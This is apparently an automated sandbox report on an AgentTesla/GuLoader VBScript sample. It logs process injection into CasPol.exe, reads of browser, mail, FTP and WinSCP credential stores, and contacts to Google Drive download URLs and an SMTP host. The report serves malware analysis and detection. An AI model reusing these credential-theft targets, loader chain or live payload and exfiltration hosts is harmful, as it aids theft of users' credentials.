Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0850DE20 CreateNamedPipeW, 20_2_0850DE20

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 715071 Sample: PUMP mt310143121.vbs Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 41 mail.prgisi.com 2->41 43 googlehosted.l.googleusercontent.com 2->43 45 2 other IPs or domains 2->45 59 Antivirus detection for URL or domain 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 Yara detected GuLoader 2->63 65 4 other signatures 2->65 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 67 Wscript starts Powershell (via cmd or directly) 9->67 69 Very long command line found 9->69 71 Encrypted powershell cmdline option found 9->71 12 powershell.exe 25 9->12         started        process6 file7 31 C:\Users\user\AppData\...\sepi5xx1.cmdline, UTF-8 12->31 dropped 33 C:\Users\user\AppData\Local\...\sepi5xx1.0.cs, UTF-8 12->33 dropped 73 Writes to foreign memory regions 12->73 75 Tries to detect Any.run 12->75 77 Compiles code for process injection (via .Net compiler) 12->77 16 CasPol.exe 19 12->16         started        20 CasPol.exe 12->20         started        22 csc.exe 3 12->22         started        25 conhost.exe 12->25         started        signatures8 process9 dnsIp10 35 googlehosted.l.googleusercontent.com 142.250.185.161, 443, 49808 GOOGLEUS United States 16->35 37 drive.google.com 142.250.186.46, 443, 49807 GOOGLEUS United States 16->37 39 mail.prgisi.com 216.218.206.36, 49809, 49810, 587 CENTRALUTAHUS United States 16->39 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->47 49 Tries to steal Mail credentials (via file / registry access) 16->49 51 Tries to harvest and steal ftp login credentials 16->51 57 3 other signatures 16->57 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->53 55 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 20->55 29 C:\Users\user\AppData\Local\...\sepi5xx1.dll, PE32 22->29 dropped 27 cvtres.exe 1 22->27         started        file11 signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.186.46
 drive.google.com United States
15169 GOOGLEUS false
142.250.185.161
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
216.218.206.36
 mail.prgisi.com United States
36103 CENTRALUTAHUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.186.46 true
googlehosted.l.googleusercontent.com 142.250.185.161 true
mail.prgisi.com 216.218.206.36 true
doc-04-9o-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 false
    		high